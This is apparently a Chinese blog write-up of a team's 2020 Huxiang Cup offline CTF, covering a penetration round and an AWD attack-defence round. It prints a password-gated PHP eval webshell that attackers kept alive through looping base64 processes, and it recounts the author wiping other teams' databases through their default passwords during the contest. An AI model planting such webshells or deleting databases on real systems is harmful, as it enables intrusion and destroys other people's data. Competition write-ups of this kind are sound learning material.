AWD

2020湖湘杯线下赛总结

“真”搅屎棍

Posted by Elli0t on 2020-11-19

比赛现场

IMG_2599

上午渗透

源码

渗透相当于闯关赛,你拿到一个网页的某个权限,就给你一个 flag,总共有6个 flag。第一关相对简单,wwwroot.zip 网页源码备份。直接下载下来然后 get flag1。接着 cobra 分析源码,跟着返回的警告进行分析。

cobra1

cobra2

在源码日志中的 3014 行找到了后台密码,然后登陆成功

1
2
3
4
5
6
7
[ info ] [ PARAM ] array (
'id' => '1',
'username' => 'admin',
'password' => 'apache123!@#qweasdzxc',
'name' => 's',
'avatar' => '',
'file' => '',

但是其实这一波我们走错方向了,进入后台后就一直在想文件上传,开始什么文件都上传不了Snipaste_2020-11-15_10-08-22

分析了一下源码,结合报错信息(这个创建失败前面返回的路径明显是有问题的),发现是由于没有权限或者路径不正确导致创建失败。于是抓包通过一个参数改了文件上传路径,回显上传成功,但是访问的时候又找不到。所以感觉是假的成功。。。

时间不够,导致就匆匆结束了。赛后问别的师傅,说是利用 thinkPHP5 的一个 payload 直接就能命令执行,我???

其实队友是准备了 payload 的,也试着打了的,但是不知道什么原因没有打成功。有点拉胯哦

总结

电脑里要准备好一些常用 cms 的 exp 库,遇到难题不要死磕,要变换思路,及时止损。

下午 AWD

1
2
3
4
5
6
7
8
9
10
11
12
13
账号 XXXXXXXX

密码 XXXXXXXX

平台 192.168.100.100

资产 172.16.105.200

Elli0t 172.16.105.5

N0vice 172.16.105.3

karsa 172.16.105.4

源码

总共三台 web 一台 pwn:靶机一两个 web,靶机二一个 pwn 一个 web

Snipaste_2020-11-15_08-29-42

这一波直接被淦翻

本来赛前都做好了一些准备,也和队友沟通了。但是比赛还是后 fix 时间还是感觉不太够。事后问,队友才说,他以为 fix 时间别人可以修改我们的 ssh 密码,然后他调了一会批量修改 ssh 的脚本

迷惑

fix 干的事:

  • 备份源码(总共3个网站,✅)
  • 备份数据库(备份失败,sqldump 命令无法执行)
  • 修改 ssh 密码、修改 mysql 密码(✅)
  • 找到默认后门(✅)
  • 文件监控(✅)
  • 修改 upload 源码(❎,没来得及)
  • weblogger 安装(❎,没有权限)

由于没有修改 upload 源码,未有效过滤上传文件,导致 fix 已结束就被上传蠕虫木马

1
2
3
4
5
6
<?php
$p = isset($_POST['p'])?$_POST['p']:'';
if (md5(md5($p)) === 'eb0071c721992c8ce8973e824c675e0e'){
eval($_POST['c']);
}
?>

以上是常规一句话,但是由于攻击者将其写入进程,导致无法删除。之前准备的删除不死🐎的命令由于之前没有使用过,导致命令报错。。。(我 tm 直接思考人生

苦闷

Snipaste_2020-11-15_16-18-28

攻击者不断生成 /bin/echo xxxxx 将木马以 base64 编码的格式进行输出,然后再 base64 -d 解码。并且进程不断的停止与开始,导致无法用命令进行进程删除。

本来想着用 weblogger 来检测流量的,结果没有权限。后面师傅提醒说可以通过 apache 日志进行流量审计,这个是真的不知道🤷‍♂️,以前都是用 apache 日志看报错信息的。

这个权限就很迷,非得用 sftp 删除某些文件,rm权限没有。我寻思可能怕某些 AWD 搅屎棍拿到权限之后删库跑路(doge

Snipaste_2020-11-15_16-32-53

最后由于扛不住,比分低于0⃣️,出局了

但是也不至于直接禁止访问平台吧。好家伙,我 tm 直接好家伙,主办方启明星辰杀人诛心……

Snipaste_2020-11-15_17-15-36

发现全场50支队伍,只有个位数的队伍改了数据库密码。嗯,我要让他们好家伙了。本着公平公正公开的奥运比赛精神,搅屎开始。坏水

Snipaste_2020-11-15_16-55-01

赛后吃饭遇到 wh1sper 师傅,呆滞他说他们比赛比到一半,库被删了。我直接嘿嘿嘿

由于没有备份数据库文件,导致他们被 check 扣了一波分。但是他们直接写了一个返回200的页面,然后就没 check 了无语

小插曲:这可能是我接触到的信号最强的屏蔽仪了,赛前说不能用无线鼠标,我说实话没太放在心上(其实是没看到通知)。我心想着屏蔽仪信号也不会太强,我鼠标就放在电脑旁边,不至于这也没信号吧。开幕式开始,鼠标有点卡卡的但是还能用,我说婷婷……哔,我说哈,可以用。结果比赛一开始,我的罗技 master 2s 直接报废,完全没反应了???看来还是我太年轻了。。。最后发现赛场放了好多屏蔽仪,离我最近的一个就在我的右边,距我4米不到,好家伙

截屏2020-11-19 下午1.49.13

旅游现场

IMG_2626

eat_dinner

IMG_2622